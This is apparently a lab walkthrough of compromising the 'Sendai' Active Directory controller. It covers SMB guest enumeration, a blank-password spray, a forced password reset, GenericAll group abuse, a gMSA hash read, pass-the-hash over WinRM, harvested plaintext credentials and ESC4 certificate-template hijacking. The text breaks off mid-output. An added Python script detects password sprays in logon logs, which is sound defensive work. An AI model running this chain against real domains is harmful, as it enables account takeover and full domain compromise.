Sendai

Initial access#

Nmap Scan#

I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target domain controller:

# Nmap 7.95 scan initiated Wed Sep 10 21:24:11 2025 as: /usr/lib/nmap/nmap --privileged -sV -vv -p- -A --min-rate 3000 -oN sendai_tcp.txt 10.129.220.222
Nmap scan report for 10.129.220.222 (10.129.220.222)
Host is up, received echo-reply ttl 127 (0.048s latency).
Scanned at 2025-09-10 21:24:12 +01 for 196s
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 20:25:46Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after: 2026-08-18T12:30:05
| MD5: 879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
|_ssl-date: TLS randomness does not represent time
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-18T12:39:21
| Not valid after: 2024-07-18T00:00:00
| MD5: 3223:91f5:f1f7:4e16:738e:382d:053e:c7fa
| SHA-1: 5282:f809:dcc9:8d53:e9a1:065a:25a1:c741:fa2c:4bc5
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after: 2026-08-18T12:30:05
| MD5: 879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after: 2026-08-18T12:30:05
| MD5: 879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after: 2026-08-18T12:30:05
| MD5: 879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-09-10T20:27:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-15T02:26:14
| Not valid after: 2025-10-15T02:26:14
| MD5: 4f35:91c2:3387:873e:3f73:7e83:1f59:fbbb
| SHA-1: 584e:2cc7:1336:099a:33c8:eee9:efe0:6922:8e71:95ce
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-10T20:26:46+00:00
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
52627/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56893/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56895/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56912/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57531/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57550/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/10%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C1DF30%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=2%ISR=10A%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FF%GCD=1%ISR=104%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.016 days (since Wed Sep 10 21:05:00 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-09-10T20:26:50
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46518/tcp): CLEAN (Timeout)
| Check 2 (port 49587/tcp): CLEAN (Timeout)
| Check 3 (port 64934/udp): CLEAN (Timeout)
| Check 4 (port 41472/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 46.56 ms 10.10.14.1 (10.10.14.1)
2 46.95 ms 10.129.220.222 (10.129.220.222)
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 21:27:28 2025 -- 1 IP address (1 host up) scanned in 197.26 seconds

Updating Hosts File#

To ensure proper name resolution for Kerberos authentication and other domain operations, I added the target to my local hosts file:

└─$ echo -e "10.129.140.152\tDC.sendai.vl\tsendai.vl\tDC" | sudo tee -a /etc/hosts
10.129.140.152 DC.sendai.vl sendai.vl DC

SMB Enumeration with Guest Access#

Starting reconnaissance with a guest account enumeration of available SMB shares on the target domain controller:

└─$ nxc smb 10.129.220.222 -u "Guest" -p "" --shares
SMB 10.129.220.222 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.220.222 445 DC [+] sendai.vl\Guest:
SMB 10.129.220.222 445 DC [*] Enumerated shares
SMB 10.129.220.222 445 DC Share Permissions Remark
SMB 10.129.220.222 445 DC ----- ----------- ------
SMB 10.129.220.222 445 DC ADMIN$ Remote Admin
SMB 10.129.220.222 445 DC C$ Default share
SMB 10.129.220.222 445 DC config
SMB 10.129.220.222 445 DC IPC$ READ Remote IPC
SMB 10.129.220.222 445 DC NETLOGON Logon server share
SMB 10.129.220.222 445 DC sendai READ company share
SMB 10.129.220.222 445 DC SYSVOL Logon server share
SMB 10.129.220.222 445 DC Users READ

The enumeration revealed that guest access was enabled, providing READ access to several shares including a company share named “sendai” and the standard Users share.

Exploring the Company Share#

Since I had read access to the “sendai” share, I explored its contents and discovered an interesting file:

[screenshot: listing of the sendai share]

Analyzing the Security Incident Report#

The incident.txt file contained a revealing security announcement from the IT department:

└─$ cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.

This document was gold - it revealed that accounts with weak passwords had been expired, meaning users would need to reset their passwords. This suggested there might be accounts with empty passwords or in a password-must-change state.

Domain User Enumeration#

I proceeded to enumerate all domain users using RID brute forcing to identify potential targets:

└─$ nxc smb 10.129.220.222 -u "Guest" -p "" --rid-brute
SMB 10.129.220.222 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.220.222 445 DC [+] sendai.vl\Guest:
SMB 10.129.220.222 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.220.222 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.129.220.222 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.129.220.222 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.129.220.222 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.129.220.222 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.129.220.222 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.129.220.222 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.129.220.222 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.129.220.222 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.129.220.222 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.129.220.222 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.129.220.222 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.220.222 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.220.222 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.220.222 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.129.220.222 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.129.220.222 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.220.222 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.220.222 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.220.222 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.220.222 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.129.220.222 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.129.220.222 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.220.222 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.129.220.222 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.129.220.222 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.129.220.222 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.129.220.222 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.129.220.222 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.129.220.222 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.129.220.222 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.129.220.222 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.129.220.222 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.129.220.222 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.129.220.222 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.129.220.222 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.129.220.222 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.129.220.222 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.129.220.222 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.129.220.222 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.129.220.222 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.129.220.222 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.129.220.222 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.129.220.222 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.129.220.222 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.129.220.222 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.129.220.222 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.129.220.222 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.129.220.222 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.129.220.222 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.129.220.222 445 DC 1131: SENDAI\support (SidTypeGroup)

I extracted all the usernames into a file for password testing:

└─$ cat tmp_users.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' > users.txt

Testing for Weak Password Policies#

Based on the incident report mentioning weak passwords, I tested if any users had blank passwords or were in a password-must-change state:

└─$ nxc smb sendai.vl -u users.txt -p "" --continue-on-success

[screenshot: nxc spray output]

I discovered two accounts with “STATUS_PASSWORD_MUST_CHANGE” - exactly what the incident report had hinted at. These accounts (Elliot.Yates and Thomas.Powell) had expired passwords and needed to be reset.
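How that spray looks from the domain controller's side, as an added example that is not part of the original post: each attempt is logged as Security event 4625, and its SubStatus field carries the NTSTATUS code behind the string NetExec printed (0xC0000224 is STATUS_PASSWORD_MUST_CHANGE). The events below are constructed from usernames in the RID brute-force output; 10.10.14.5 is a made-up source address.

```python
"""Spot a blank-password spray and STATUS_PASSWORD_MUST_CHANGE results in DC logon failures.

Added example, not part of the original post. Records are constructed and use
event 4625 field names (IpAddress, TargetUserName, SubStatus).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values worth naming; 0xC0000224 means the supplied (here: empty)
# password was accepted but the account is flagged "must change at next logon".
SUBSTATUS = {
    "0xC000006A": "wrong password",
    "0xC0000064": "user does not exist",
    "0xC0000071": "password expired",
    "0xC0000224": "password must change",
}
MUST_CHANGE = "0xC0000224"

SAMPLE_EVENTS = [  # constructed: one failure per account in users.txt from a single source
    {"TimeCreated": "2025-09-10T20:40:01", "IpAddress": "10.10.14.5", "TargetUserName": "Dorothy.Jones", "SubStatus": "0xC000006A"},
    {"TimeCreated": "2025-09-10T20:40:01", "IpAddress": "10.10.14.5", "TargetUserName": "Kerry.Robinson", "SubStatus": "0xC000006A"},
    {"TimeCreated": "2025-09-10T20:40:02", "IpAddress": "10.10.14.5", "TargetUserName": "Naomi.Gardner", "SubStatus": "0xC000006A"},
    {"TimeCreated": "2025-09-10T20:40:02", "IpAddress": "10.10.14.5", "TargetUserName": "Elliot.Yates", "SubStatus": "0xC0000224"},
    {"TimeCreated": "2025-09-10T20:40:03", "IpAddress": "10.10.14.5", "TargetUserName": "Malcolm.Smith", "SubStatus": "0xC000006A"},
    {"TimeCreated": "2025-09-10T20:40:03", "IpAddress": "10.10.14.5", "TargetUserName": "Thomas.Powell", "SubStatus": "0xC0000224"},
    # an unrelated single typo from a workstation: must not be reported as a spray
    {"TimeCreated": "2025-09-10T20:41:30", "IpAddress": "10.129.5.20", "TargetUserName": "Susan.Harper", "SubStatus": "0xC000006A"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def find_sprays(events, window=timedelta(minutes=2), min_users=5):
    """Sources that fail logons for >= min_users distinct accounts inside `window`.
    Returns {ip: sorted distinct usernames tried from that ip}."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=_ts):
        by_src[ev["IpAddress"]].append(ev)
    sprays = {}
    for ip, evs in by_src.items():
        start = 0
        for end, ev in enumerate(evs):
            while _ts(ev) - _ts(evs[start]) > window:  # slide the window forward
                start += 1
            if len({e["TargetUserName"] for e in evs[start:end + 1]}) >= min_users:
                sprays[ip] = sorted({e["TargetUserName"] for e in evs})
                break
    return sprays


def must_change_hits(events):
    """Accounts answered with STATUS_PASSWORD_MUST_CHANGE: the password was accepted,
    so whoever sprayed now knows it and the account needs an out-of-band reset."""
    return sorted({e["TargetUserName"] for e in events if e["SubStatus"] == MUST_CHANGE})


if __name__ == "__main__":
    for ip, users in find_sprays(SAMPLE_EVENTS).items():
        print(f"spray from {ip}: {len(users)} distinct accounts")
    for user in must_change_hits(SAMPLE_EVENTS):
        print(f"{user}: {SUBSTATUS[MUST_CHANGE]}")
```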

Password Reset and Initial Access#

To take advantage of this, I used NetExec’s password change module to set a new password for Elliot.Yates, thereby obtaining valid domain credentials:

└─$ nxc smb sendai.vl -u "Elliot.Yates" -p "" -M change-password -o NEWPASS=Password@123

[screenshot: change-password module output]

With the password successfully changed, I now had working credentials for a domain user account.

Active Directory Analysis with BloodHound#

With valid credentials in hand, I collected comprehensive Active Directory data for analysis using BloodHound:

└─$ bloodhound-python -d sendai.vl -u "Elliot.Yates" -p "Password@123" -ns 10.129.125.63 -dc DC.sendai.vl -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 11S
INFO: Compressing output into 20250914234327_bloodhound.zip

After ingesting the BloodHound data, I discovered that both Elliot.Yates and Thomas.Powell were members of the “support” group, which had GenericAll privileges on the “ADMSVC” group:

[screenshot: BloodHound graph, support group GenericAll on ADMSVC]

This GenericAll privilege meant I could add members to the ADMSVC group. BloodHound also showed that ADMSVC can read the gMSA password of MGTSVC$ (ReadGMSAPassword), so this looked like the right path:

[screenshot: BloodHound graph, ADMSVC ReadGMSAPassword on MGTSVC$]

Exploiting Group Membership Control#

To escalate privileges, I leveraged the GenericAll permission to add Elliot.Yates to the ADMSVC group:

└─$ bloodyAD -u "Elliot.Yates" -p "Password@123" -d sendai.vl --host dc.sendai.vl add groupMember "ADMSVC" "ELLIOT.YATES"
[+] ELLIOT.YATES added to ADMSVC

With ADMSVC membership established, I could now access the gMSA password for the MGTSVC$ service account:

└─$ nxc ldap sendai.vl -u "Elliot.Yates" -p "Password@123" --gmsa
LDAP 10.129.140.152 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never)
LDAP 10.129.140.152 389 DC [+] sendai.vl\Elliot.Yates:Password@123
LDAP 10.129.140.152 389 DC [*] Getting GMSA Passwords
LDAP 10.129.140.152 389 DC Account: mgtsvc$ NTLM: 9ed35c68b88f35007aa32c14c1332ce7 PrincipalsAllowedToReadPassword: admsvc

Using the extracted NTLM hash, I authenticated to the domain controller as the MGTSVC$ service account:

└─$ evil-winrm -i sendai.vl -u "mgtsvc$" -H "9ed35c68b88f35007aa32c14c1332ce7"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>

Post-Exploit Enumeration and Privilege Escalation#

With access as the service account, I began exploring the system for additional credentials or attack vectors. A review of the C:\ directory revealed a configuration folder that contained database credentials:

*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/11/2023 5:56 AM config
d----- 4/15/2025 8:20 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 4/15/2025 7:51 PM Program Files
d----- 7/18/2023 6:11 AM Program Files (x86)
d----- 7/18/2023 10:31 AM sendai
d----- 7/11/2023 2:35 AM SQL2019
d-r--- 9/17/2025 1:58 AM Users
d----- 8/18/2025 5:04 AM Windows
-a---- 4/15/2025 8:27 PM 32 user.txt
*Evil-WinRM* PS C:\> cd config
*Evil-WinRM* PS C:\config> cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

The SQL configuration file revealed credentials for the sqlsvc account. After testing various privilege escalation vectors with these credentials without success, I shifted focus to enumerating running services for additional attack surfaces.

Process and Service Enumeration#

Looking at the running processes, I found an unusual process named helpdesk:

[screenshot: process list showing helpdesk]

I examined the Windows registry for service configurations containing the name helpdesk:

*Evil-WinRM* PS C:\Users\mgtsvc$\documents> dir -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | select-string "helpdesk"

This enumeration revealed another set of credentials, embedded in the ImagePath (the service's command line) of the helpdesk service, for the user Clifford.Davey:

[screenshot: helpdesk service ImagePath containing Clifford.Davey's credentials]

Analyzing Certificate Authority Permissions#

Referring back to the BloodHound data, I confirmed that Clifford.Davey was a member of the CA-OPERATORS group, which suggested potential access to certificate authority operations.

Certificate Template Vulnerability Assessment#

With Clifford.Davey’s credentials, I performed a comprehensive enumeration of the Active Directory Certificate Services to identify potential vulnerabilities:

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p" -dc-ip 10.129.140.152 -dc-host dc.sendai.vl -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sendai-DC-CA
DNS Name : dc.sendai.vl
Certificate Subject : CN=sendai-DC-CA, DC=sendai, DC=vl
Certificate Serial Number : 326E51327366FC954831ECD5C04423BE
Certificate Validity Start : 2023-07-11 09:19:29+00:00
Certificate Validity End : 2123-07-11 09:29:29+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SENDAI.VL\Administrators
Access Rights
ManageCa : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
ManageCertificates : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
Enroll : SENDAI.VL\Authenticated Users
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-11T12:46:12+00:00
Template Last Modified : 2023-07-11T12:46:19+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Owner Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Dacl Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Property Enroll : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
[+] User Enrollable Principals : SENDAI.VL\Domain Computers
SENDAI.VL\ca-operators
[+] User ACL Principals : SENDAI.VL\ca-operators
[!] Vulnerabilities
ESC4 : User has dangerous permissions.

The enumeration flagged an ESC4 vulnerability on the SendaiComputer certificate template: the ca-operators group holds Full Control, Write Owner and Write Dacl over the template object (see the Object Control Permissions above). As documented in the Certipy documentation, ESC4 (Template Hijacking) occurs when an attacker gains write permissions on a certificate template. Those permissions allow modifying the template into a vulnerable configuration, requesting a certificate using the modified template, and then reverting the changes to cover tracks.

Template Hijacking Attack#

To exploit this vulnerability, I first saved the current template configuration and then modified it to create a vulnerable state:

Terminal window
└─$ certipy-ad -debug template -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -template SendaiComputer -dc-ip 10.129.140.152 -dc-host dc.sendai.vl -target dc.sendai.vl -write-default-configuration
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: '10.129.140.152'
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to 'SendaiComputer.json'
[+] Attempting to write data to 'SendaiComputer.json'
[+] Data written to 'SendaiComputer.json'
[*] Wrote current configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
